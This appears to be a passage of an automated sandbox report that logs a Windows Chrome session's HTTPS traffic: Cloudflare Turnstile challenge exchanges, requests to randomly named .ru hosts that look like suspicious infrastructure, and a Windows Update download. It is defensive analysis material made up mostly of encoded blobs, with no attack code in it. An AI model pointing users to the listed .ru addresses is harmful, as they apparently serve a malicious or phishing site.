                                                                              2024-11-26 19:54:56 UTC1369INData Raw: 49 31 36 77 4b 47 4e 6a 71 50 42 6d 5a 4b 31 68 37 65 38 6c 70 36 62 6d 61 2b 50 76 38 4f 52 70 71 4f 68 74 35 66 48 7a 4c 66 53 71 70 76 43 76 38 57 2b 70 71 53 31 75 4d 76 5a 32 4d 58 47 33 4e 7a 67 79 36 7a 55 30 72 61 7a 77 63 4b 36 75 4d 6e 4d 33 2b 33 67 30 50 57 38 7a 50 6e 69 39 66 54 34 34 38 54 61 41 67 33 77 32 65 41 4a 39 50 33 64 45 65 50 69 30 68 6b 45 43 66 77 53 32 4f 33 76 2f 67 45 51 46 51 51 62 39 52 38 4c 43 67 34 48 47 75 6a 39 36 67 38 69 49 53 55 6d 38 41 58 7a 4c 76 51 4c 44 42 73 68 4c 44 45 32 4e 78 4d 37 4a 7a 41 71 49 6b 59 46 46 77 63 72 50 6a 31 42 4b 41 30 64 53 30 6c 4c 4a 46 68 47 54 43 59 38 4f 30 35 4e 55 46 34 64 4d 47 52 53 57 44 4a 4a 58 69 55 34 62 46 70 66 4f 6c 42 50 59 6d 46 6c 62 6a 46 45 65 47 5a 72 52 6c 31 79
                                                                              Data Ascii: I16wKGNjqPBmZK1h7e8lp6bma+Pv8ORpqOht5fHzLfSqpvCv8W+pqS1uMvZ2MXG3Nzgy6zU0razwcK6uMnM3+3g0PW8zPni9fT448TaAg3w2eAJ9P3dEePi0hkECfwS2O3v/gEQFQQb9R8LCg4HGuj96g8iISUm8AXzLvQLDBshLDE2NxM7JzAqIkYFFwcrPj1BKA0dS0lLJFhGTCY8O05NUF4dMGRSWDJJXiU4bFpfOlBPYmFlbjFEeGZrRl1y


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              36192.168.2.1649751104.18.95.414436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:54:57 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/162202576:1732648377:xJw3Yk9mP_9VbSTJ6hBeBUYSgE5rlGFuHoiAhOyQQkY/8e8c6e9b1b1b437a/U53pjxBE6J_qm7SeFH2fTixXqSKgUXPkQ7r9WMB6ixg-1732650884-1.1.1.1-TiNTbGxWksGGqbcVVWSpCjPEP5XonQk4nAMPFuFc8GGEp1fPMoQhEvt7Psw0jIKP HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-11-26 19:54:58 UTC379INHTTP/1.1 404 Not Found
                                                                              Date: Tue, 26 Nov 2024 19:54:57 GMT
                                                                              Content-Type: application/json
                                                                              Content-Length: 7
                                                                              Connection: close
                                                                              cf-chl-out: m+yk4RmgWr7e69OjcWoUXNi11GnNpjr+7pA=$NTB9tbZWHMCJF/7B
                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e8c6eefc92572b1-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-11-26 19:54:58 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                              Data Ascii: invalid


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              37192.168.2.1649752104.18.95.414436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:55:03 UTC1174OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/162202576:1732648377:xJw3Yk9mP_9VbSTJ6hBeBUYSgE5rlGFuHoiAhOyQQkY/8e8c6e9b1b1b437a/U53pjxBE6J_qm7SeFH2fTixXqSKgUXPkQ7r9WMB6ixg-1732650884-1.1.1.1-TiNTbGxWksGGqbcVVWSpCjPEP5XonQk4nAMPFuFc8GGEp1fPMoQhEvt7Psw0jIKP HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Content-Length: 34208
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              Content-type: application/x-www-form-urlencoded
                                                                              CF-Chl-RetryAttempt: 0
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              CF-Challenge: U53pjxBE6J_qm7SeFH2fTixXqSKgUXPkQ7r9WMB6ixg-1732650884-1.1.1.1-TiNTbGxWksGGqbcVVWSpCjPEP5XonQk4nAMPFuFc8GGEp1fPMoQhEvt7Psw0jIKP
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Origin: https://challenges.cloudflare.com
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/lgd21/0x4AAAAAAA0MpIT_R9fG8S2s/auto/fbE/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-11-26 19:55:03 UTC16384OUTData Raw: 76 5f 38 65 38 63 36 65 39 62 31 62 31 62 34 33 37 61 3d 39 78 65 49 7a 35 37 64 59 67 68 47 78 47 33 35 66 47 48 47 6c 76 73 37 4c 47 75 47 6e 77 6c 68 34 78 47 52 47 68 77 47 34 6a 47 75 47 73 50 49 74 64 37 45 47 5a 77 74 5a 34 37 6f 50 33 47 74 70 47 37 31 47 50 30 4a 33 34 47 76 33 4a 35 33 72 48 41 47 77 47 53 74 47 73 54 47 7a 45 71 49 49 56 47 65 50 6a 47 4b 47 65 32 73 59 68 47 71 6a 47 74 79 33 67 54 37 52 74 6a 25 32 62 41 24 4f 2b 67 71 45 68 47 55 38 38 6c 39 77 47 55 41 47 5a 33 73 49 37 57 47 37 64 38 6e 77 37 67 73 70 65 33 47 35 64 47 43 5a 41 47 73 4c 35 59 66 48 7a 33 2b 6e 35 38 5a 67 33 74 47 74 71 78 66 6a 5a 76 47 47 54 56 6e 47 37 72 68 38 77 30 49 6c 33 47 71 54 36 74 63 72 57 4f 77 31 67 2b 56 5a 32 36 45 74 5a 66 58 75 53 2d 59
                                                                              Data Ascii: v_8e8c6e9b1b1b437a=9xeIz57dYghGxG35fGHGlvs7LGuGnwlh4xGRGhwG4jGuGsPItd7EGZwtZ47oP3GtpG71GP0J34Gv3J53rHAGwGStGsTGzEqIIVGePjGKGe2sYhGqjGty3gT7Rtj%2bA$O+gqEhGU88l9wGUAGZ3sI7WG7d8nw7gspe3G5dGCZAGsL5YfHz3+n58Zg3tGtqxfjZvGGTVnG7rh8w0Il3GqT6tcrWOw1g+VZ26EtZfXuS-Y
                                                                              2024-11-26 19:55:03 UTC16384OUTData Raw: 76 74 77 5a 37 5a 77 36 65 47 47 67 78 54 34 72 49 69 47 68 78 65 6f 76 47 35 71 49 42 77 6c 73 72 36 47 58 78 37 2d 70 38 65 2b 47 37 42 56 79 4f 65 47 47 63 35 6a 47 41 47 38 49 47 42 49 55 47 72 49 35 71 49 47 49 71 77 37 54 47 35 49 38 64 35 66 47 4b 47 47 6a 37 52 47 50 47 74 77 47 65 47 45 6a 39 6a 37 5a 6a 65 49 74 65 47 36 47 43 5a 6c 50 37 71 47 69 47 38 68 35 44 66 51 47 38 69 47 36 49 71 47 48 5a 47 78 47 33 77 37 7a 63 38 47 36 49 38 77 73 4d 47 4f 49 73 68 35 6d 49 68 47 74 49 37 49 47 6e 47 76 68 35 55 47 62 49 65 78 72 35 35 78 62 63 73 47 42 49 4c 47 77 4a 67 48 47 30 77 37 77 47 54 77 68 47 63 70 37 77 37 32 68 67 47 6c 65 47 4d 47 63 49 37 75 41 47 64 6c 47 47 2b 47 66 47 64 73 35 24 47 63 69 73 6f 61 59 47 75 47 47 49 72 37 47 70 47 79
                                                                              Data Ascii: vtwZ7Zw6eGGgxT4rIiGhxeovG5qIBwlsr6GXx7-p8e+G7BVyOeGGc5jGAG8IGBIUGrI5qIGIqw7TG5I8d5fGKGGj7RGPGtwGeGEj9j7ZjeIteG6GCZlP7qGiG8h5DfQG8iG6IqGHZGxG3w7zc8G6I8wsMGOIsh5mIhGtI7IGnGvh5UGbIexr55xbcsGBILGwJgHG0w7wGTwhGcp7w72hgGleGMGcI7uAGdlGG+GfGds5$GcisoaYGuGGIr7GpGy
                                                                              2024-11-26 19:55:03 UTC1440OUTData Raw: 49 47 57 68 53 55 77 4f 4c 75 47 75 47 74 49 47 46 75 37 6a 39 64 47 4d 52 66 36 78 75 31 48 47 6e 74 50 2d 24 70 39 48 6c 43 71 6c 43 6c 53 47 35 2b 41 71 49 47 39 6a 6c 6a 70 30 24 51 53 47 69 58 49 30 49 47 74 55 30 49 37 73 6f 78 72 63 65 50 73 6f 51 44 30 6c 35 49 38 59 37 76 4a 72 47 72 63 6e 42 47 48 6f 64 71 54 58 68 6c 69 6d 34 67 41 47 62 77 67 61 74 6d 70 4c 6c 6c 70 37 67 50 75 4e 64 37 34 2b 57 64 77 74 5a 35 68 77 77 49 6e 4b 24 66 47 39 63 30 6a 47 47 49 76 47 65 69 33 24 24 31 66 6d 5a 58 54 61 5a 63 6d 72 6d 6f 77 67 42 70 56 48 58 50 37 47 37 65 4d 58 4b 7a 64 38 6a 61 54 45 58 41 38 54 34 69 58 73 41 6e 65 72 78 2d 42 51 50 41 69 70 70 7a 6a 67 46 54 5a 47 47 49 6c 55 24 32 4a 35 77 65 2d 47 58 68 33 55 69 6d 43 24 46 4a 47 54 6a 47 36
                                                                              Data Ascii: IGWhSUwOLuGuGtIGFu7j9dGMRf6xu1HGntP-$p9HlCqlClSG5+AqIG9jljp0$QSGiXI0IGtU0I7soxrcePsoQD0l5I8Y7vJrGrcnBGHodqTXhlim4gAGbwgatmpLllp7gPuNd74+WdwtZ5hwwInK$fG9c0jGGIvGei3$$1fmZXTaZcmrmowgBpVHXP7G7eMXKzd8jaTEXA8T4iXsAnerx-BQPAippzjgFTZGGIlU$2J5we-GXh3UimC$FJGTjG6
                                                                              2024-11-26 19:55:04 UTC286INHTTP/1.1 200 OK
                                                                              Date: Tue, 26 Nov 2024 19:55:04 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 4472
                                                                              Connection: close
                                                                              cf-chl-out: tYwBpZ0vVzLOc157zAGYBbBKKA0B0+M4/t0NXWgAAUvFNEaL/chzE42s3qJ/4wii0KmB5E7aeEh6cfIbdDbW0wq1t0zohVe455EwwAYTED3tEKT2P1JQd5k=$KZK8GKYRGucibN+H
                                                                              2024-11-26 19:55:04 UTC1259INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 2d 73 3a 20 58 6f 55 2f 67 7a 50 6a 36 56 69 6c 69 4b 77 4c 62 2f 73 70 63 61 6d 49 4f 33 61 47 58 4b 44 79 6f 46 76 78 70 6f 34 65 78 79 72 49 6d 6d 57 68 78 74 50 6e 6a 34 71 36 72 56 6f 58 37 69 75 75 75 46 53 2f 74 65 37 46 6f 68 42 4f 53 2b 59 6f 7a 46 52 4e 48 54 55 4e 67 54 6c 33 33 4a 76 78 72 48 45 5a 45 43 4b 78 38 5a 50 34 71 2f 65 6f 71 54 50 37 4a 37 6d 78 4a 2f 61 79 72 51 65 58 42 4e 6c 41 6c 46 58 50 57 38 48 36 61 74 2b 46 66 35 7a 62 56 56 52 51 69 4b 7a 68 38 54 41 6f 49 73 51 32 69 53 46 6c 2f 67 37 66 34 6f 5a 70 77 2f 6c 4e 6c 59 74 46 4e 53 41 36 72 70 6e 36 63 70 71 44 44 69 73 65 36 6b 62 75 6d 69 2b 70 69 6e 51 7a 57 6a 76 4e 54 34 6f 7a 55 76 39 33 64 4d 4c 6c 49 4f 58 4d 57 4b 72 46 32 31 59 65 31
                                                                              Data Ascii: cf-chl-out-s: XoU/gzPj6ViliKwLb/spcamIO3aGXKDyoFvxpo4exyrImmWhxtPnj4q6rVoX7iuuuFS/te7FohBOS+YozFRNHTUNgTl33JvxrHEZECKx8ZP4q/eoqTP7J7mxJ/ayrQeXBNlAlFXPW8H6at+Ff5zbVVRQiKzh8TAoIsQ2iSFl/g7f4oZpw/lNlYtFNSA6rpn6cpqDDise6kbumi+pinQzWjvNT4ozUv93dMLlIOXMWKrF21Ye1
                                                                              2024-11-26 19:55:04 UTC1193INData Raw: 57 49 52 43 64 6d 4a 2f 69 6e 46 75 58 6b 39 76 61 31 42 79 68 6d 56 69 6b 70 75 46 62 49 35 39 67 48 79 65 64 47 35 63 6d 4a 69 63 6f 49 6d 49 6e 59 35 35 6d 4b 65 4a 6b 34 53 43 6b 58 65 35 70 59 56 37 76 61 61 7a 6a 33 61 71 65 36 53 38 6f 5a 65 6b 76 72 53 53 74 61 47 62 76 62 6d 78 6d 38 4b 4b 76 4b 6d 72 72 38 36 73 6b 64 4b 7a 74 35 62 53 75 4d 75 76 75 64 72 65 70 65 44 49 36 64 53 6f 74 36 79 37 77 65 62 72 37 4d 72 4c 39 65 44 53 30 37 4c 6e 78 4e 54 31 30 65 6a 4c 75 75 7a 38 2f 41 66 78 31 75 6b 4c 79 51 48 65 7a 4e 72 42 42 77 33 38 2f 4f 73 55 31 52 45 59 30 67 58 79 35 39 55 4b 44 51 49 4e 2f 67 4c 33 46 78 38 6b 48 52 73 69 2b 66 6a 71 47 2b 59 47 42 41 66 39 45 75 73 48 4b 6a 51 58 47 6a 66 75 39 54 6e 36 4f 78 4c 38 4e 78 4d 69 4f 77 4d
                                                                              Data Ascii: WIRCdmJ/inFuXk9va1ByhmVikpuFbI59gHyedG5cmJicoImInY55mKeJk4SCkXe5pYV7vaazj3aqe6S8oZekvrSStaGbvbmxm8KKvKmrr86skdKzt5bSuMuvudrepeDI6dSot6y7webr7MrL9eDS07LnxNT10ejLuuz8/Afx1ukLyQHezNrBBw38/OsU1REY0gXy59UKDQIN/gL3Fx8kHRsi+fjqG+YGBAf9EusHKjQXGjfu9Tn6OxL8NxMiOwM
                                                                              2024-11-26 19:55:04 UTC1369INData Raw: 73 6f 47 39 75 33 65 78 77 37 2b 7a 4e 50 2b 7a 41 45 53 45 77 54 77 31 41 72 55 38 52 6b 50 41 68 67 65 34 79 51 61 4b 42 55 6f 49 79 34 45 41 76 34 71 48 54 41 42 37 41 6b 42 4e 50 4d 31 44 68 48 7a 4b 51 6f 65 39 7a 31 45 47 41 46 41 4a 68 39 46 41 42 59 55 42 54 67 75 54 56 49 37 56 44 35 4e 50 30 42 48 45 55 5a 48 56 6c 5a 58 4c 6c 49 65 4f 45 78 57 5a 46 41 6c 56 32 67 39 50 6c 59 6b 61 48 42 4a 4c 31 31 43 61 48 59 7a 61 33 68 32 4f 48 78 52 4f 48 68 4b 64 48 70 37 56 6e 31 41 52 56 4a 42 69 46 35 64 68 34 5a 34 66 47 71 4b 6a 6d 5a 4d 55 46 57 45 55 5a 6d 48 65 6f 6d 65 58 56 68 65 6d 6e 64 64 6c 5a 32 50 70 4a 47 71 6f 33 61 61 5a 5a 74 39 71 61 71 63 69 6d 78 75 63 37 53 69 63 49 36 57 68 48 57 71 66 5a 62 43 76 72 52 38 78 6f 53 77 75 73 6e 48
                                                                              Data Ascii: soG9u3exw7+zNP+zAESEwTw1ArU8RkPAhge4yQaKBUoIy4EAv4qHTAB7AkBNPM1DhHzKQoe9z1EGAFAJh9FABYUBTguTVI7VD5NP0BHEUZHVlZXLlIeOExWZFAlV2g9PlYkaHBJL11CaHYza3h2OHxROHhKdHp7Vn1ARVJBiF5dh4Z4fGqKjmZMUFWEUZmHeomeXVhemnddlZ2PpJGqo3aaZZt9qaqcimxuc7SicI6WhHWqfZbCvrR8xoSwusnH
                                                                              2024-11-26 19:55:04 UTC1369INData Raw: 77 43 35 75 76 48 35 76 48 55 37 68 76 36 44 68 51 62 37 42 51 5a 2f 50 6b 5a 42 68 63 46 4b 67 73 58 42 69 45 4f 36 77 59 6b 45 6a 4d 50 4b 43 41 75 4a 76 59 59 50 41 30 51 4b 68 59 30 46 67 49 41 4e 78 51 6c 50 69 52 45 48 44 51 62 53 30 63 4e 52 77 70 4d 49 6c 56 54 51 45 41 6a 57 45 56 45 53 31 78 53 56 46 74 63 55 7a 63 30 56 43 34 6b 53 47 45 31 4b 43 64 69 4c 57 52 51 63 56 77 2b 58 44 42 45 61 30 68 73 55 56 4a 35 50 47 70 6f 67 44 4e 75 66 45 42 38 64 58 64 5a 56 49 74 6b 67 48 39 61 65 32 4b 4b 69 6f 4f 52 6c 4a 4b 51 55 56 4e 58 55 57 57 57 69 46 57 57 58 5a 39 75 6b 35 39 38 67 61 68 6e 6f 34 71 4b 61 49 57 4f 72 62 43 74 61 59 52 7a 64 6e 46 78 63 58 6d 4b 64 4c 36 54 63 58 6c 39 76 72 2b 2b 77 33 6a 45 6c 73 71 66 73 38 61 4e 70 4e 44 43 30
                                                                              Data Ascii: wC5uvH5vHU7hv6DhQb7BQZ/PkZBhcFKgsXBiEO6wYkEjMPKCAuJvYYPA0QKhY0FgIANxQlPiREHDQbS0cNRwpMIlVTQEAjWEVES1xSVFtcUzc0VC4kSGE1KCdiLWRQcVw+XDBEa0hsUVJ5PGpogDNufEB8dXdZVItkgH9ae2KKioORlJKQUVNXUWWWiFWWXZ9uk598gahno4qKaIWOrbCtaYRzdnFxcXmKdL6TcXl9vr++w3jElsqfs8aNpNDC0
                                                                              2024-11-26 19:55:04 UTC541INData Raw: 54 37 63 77 57 46 64 77 62 31 79 45 63 45 43 51 6c 45 50 77 6f 34 42 54 6e 4a 79 34 43 35 79 66 6e 4c 75 67 6c 37 2f 4d 33 4d 2f 59 7a 38 7a 67 38 4b 67 34 35 2b 67 49 69 48 66 73 75 2f 43 45 46 48 51 55 63 44 44 67 68 53 68 45 37 54 31 52 52 44 43 4a 49 45 55 5a 59 57 52 74 59 4f 68 67 65 53 30 49 36 49 54 73 36 50 57 63 63 57 47 68 73 4b 79 56 4f 4c 6a 42 53 63 54 56 69 4c 57 59 32 64 6e 64 79 66 46 56 61 64 7a 6c 71 67 33 31 43 67 6c 35 38 68 30 6c 64 52 59 32 49 54 55 69 4c 65 70 42 64 6b 56 56 32 6a 70 71 43 6a 49 75 59 69 56 6d 4a 58 4a 31 64 6c 4a 2b 66 6b 4a 5a 6b 66 32 53 6d 71 4b 64 35 71 57 79 71 5a 62 4a 77 69 48 47 6a 73 34 78 30 74 33 65 6e 6e 62 32 38 71 35 47 2b 76 72 2b 5a 79 49 4f 66 68 62 7a 47 6f 4e 43 36 79 37 72 54 7a 63 36 6f 6b 63
                                                                              Data Ascii: T7cwWFdwb1yEcECQlEPwo4BTnJy4C5yfnLugl7/M3M/Yz8zg8Kg45+gIiHfsu/CEFHQUcDDghShE7T1RRDCJIEUZYWRtYOhgeS0I6ITs6PWccWGhsKyVOLjBScTViLWY2dndyfFVadzlqg31Cgl58h0ldRY2ITUiLepBdkVV2jpqCjIuYiVmJXJ1dlJ+fkJZkf2SmqKd5qWyqZbJwiHGjs4x0t3ennb28q5G+vr+ZyIOfhbzGoNC6y7rTzc6okc


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              38192.168.2.1649753104.18.95.414436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:55:05 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/162202576:1732648377:xJw3Yk9mP_9VbSTJ6hBeBUYSgE5rlGFuHoiAhOyQQkY/8e8c6e9b1b1b437a/U53pjxBE6J_qm7SeFH2fTixXqSKgUXPkQ7r9WMB6ixg-1732650884-1.1.1.1-TiNTbGxWksGGqbcVVWSpCjPEP5XonQk4nAMPFuFc8GGEp1fPMoQhEvt7Psw0jIKP HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-11-26 19:55:06 UTC379INHTTP/1.1 404 Not Found
                                                                              Date: Tue, 26 Nov 2024 19:55:06 GMT
                                                                              Content-Type: application/json
                                                                              Content-Length: 7
                                                                              Connection: close
                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              cf-chl-out: EvMhQqhja2bCnSGbJHefqi9M/SxsjieJ5dQ=$27qwwitaK09zx4j8
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e8c6f22ed7c6a5e-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-11-26 19:55:06 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                              Data Ascii: invalid


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              39192.168.2.1649755172.67.189.384436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:55:07 UTC670OUTGET /384603737182923034134733HBIvtgFvMdHIJNXFWYVMFPBUZFKSEIVKZFXFTFPINW HTTP/1.1
                                                                              Host: uxxrejmt6jqxcuujcxblqanwhjvd5pcl9nswmcr2amxwat4lija5ohuixy2.bfcgpixdwnw.ru
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Origin: https://7x7.jaaqwamco.ru
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Referer: https://7x7.jaaqwamco.ru/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-11-26 19:55:08 UTC887INHTTP/1.1 200 OK
                                                                              Date: Tue, 26 Nov 2024 19:55:08 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Access-Control-Allow-Origin: *
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a1J8gt%2F7bXkDeLtx6hQJdBLa%2BJbdJIt52vwLSpqEUgp1G3FHO%2BRlxcCxdIPPECpoL6CVRQEXnijq6jkj8UYMfnNoP7unZ8N%2BmRrO1TGwlUXIancidOPUhKAA%2FXZrsH7NYBymfoH3LfzZx0ksD%2BEgXPEWitpoTb1lGg3%2Bh4dJWQDEL8OMVdMR5XfbT%2F3lFnjumylMVaJIhPC98681Xw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e8c6f2d7fadc358-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1546&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1248&delivery_rate=1868202&cwnd=155&unsent_bytes=0&cid=c1ef7a73112a4ae8&ts=941&x=0"
                                                                              2024-11-26 19:55:08 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                              Data Ascii: 11
                                                                              2024-11-26 19:55:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              40192.168.2.1649759172.67.189.384436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:55:11 UTC464OUTGET /384603737182923034134733HBIvtgFvMdHIJNXFWYVMFPBUZFKSEIVKZFXFTFPINW HTTP/1.1
                                                                              Host: uxxrejmt6jqxcuujcxblqanwhjvd5pcl9nswmcr2amxwat4lija5ohuixy2.bfcgpixdwnw.ru
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-11-26 19:55:12 UTC883INHTTP/1.1 200 OK
                                                                              Date: Tue, 26 Nov 2024 19:55:12 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Access-Control-Allow-Origin: *
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x8790ozb%2B2HdxAi1eSQajnucyPmG4HLksxXC2fPr6Pm%2B23LNPa6%2Fyp3s7c%2FLKQwlcCkAi7T2z17Es0TQocUOibIJKAIQH2SSqhcEiq4x49FZ5476%2B5Bu6G3tm91ndyReRDyiIHSRDC0767GAxrfTw7FGe7r2otI7PBs75Ge57cJ7T7mtByHNMh4VRW%2FJgORSVROgQ6Ab8ZFRbvgC3w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e8c6f45798a42d3-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1607&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1042&delivery_rate=1825000&cwnd=246&unsent_bytes=0&cid=7a051b4c8f92c414&ts=942&x=0"
                                                                              2024-11-26 19:55:12 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                              Data Ascii: 11
                                                                              2024-11-26 19:55:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              41192.168.2.16497604.245.163.56443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:55:12 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=s8KFDPC2G8SYPmy&MD=l5dLo5zL HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept: */*
                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                              Host: slscr.update.microsoft.com
                                                                              2024-11-26 19:55:13 UTC560INHTTP/1.1 200 OK
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              Content-Type: application/octet-stream
                                                                              Expires: -1
                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                              ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                              MS-CorrelationId: 15b40c8c-459d-48f8-8710-faf369ac1f85
                                                                              MS-RequestId: 85497fcb-03ed-4adc-8e42-f9e5ccf71ff5
                                                                              MS-CV: p6HFIechtk2wL2fP.0
                                                                              X-Microsoft-SLSClientCache: 1440
                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                              X-Content-Type-Options: nosniff
                                                                              Date: Tue, 26 Nov 2024 19:55:11 GMT
                                                                              Connection: close
                                                                              Content-Length: 30005
                                                                              2024-11-26 19:55:13 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
